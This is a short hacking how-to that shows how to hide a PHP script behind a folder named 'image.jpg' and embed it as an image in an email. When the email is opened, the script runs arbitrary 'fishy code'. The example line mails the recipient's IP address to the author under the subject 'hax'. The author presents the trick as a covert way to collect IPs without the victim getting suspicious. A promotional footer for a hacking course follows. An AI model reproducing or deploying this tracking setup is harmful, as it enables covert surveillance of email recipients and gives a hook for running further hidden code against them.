In this how-to we will be sending an email with an image we get from a php script after running some fishy code.
What you'll need
- Apache web server with PHP
- An image (included bellow)
- An email Account (I use gmail)
Make a folder called "image.jpg" in your public html folder. In your "image.jpg" folder place your "image.jpg" file and your "index.php" file.
I will be using this image as an example.
The contents of your "index.php" file should be as follows
//fishy stuff here
Where it says "//fishy stuff here" put any fishy code you want to run.
mail("firstname.lastname@example.org", "hax", $_SERVER['REMOTE_ADDR'] . ' : ' . $_SERVER['HTTP_X_FORWARDED_FOR']);
Which emails me the IP address of the user.
Start by filling out the "to" and "subject" fields.
Click on the image icon to add an image to your email.
Click on "Web Address (URL)" and put the address to your "image.jpg" folder not image. If everything is set up right, the image and a check mark should appear.
If every thing went well you should see your image in the message field. Now all you need to do is send the email and wait for someone to open it.
When someone opens the email their browser sees the image tag and goes to "http://example.com/image.jpg" to get the image. When the browser goes to "http://example.com/image.jpg" since it is a folder "index.php" is run as if they went to the page. When "index.php" is run it executes the fishy code then send the content back to the browser in the form of an image which is displayed in the email so the user does not get suspicious.
This can be used to get IP addresses or to do fishy stuff. Thank you for reading my how-to! I am new to this site and would appreciate any feedback in the comments bellow.
Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.
Other worthwhile deals to check out: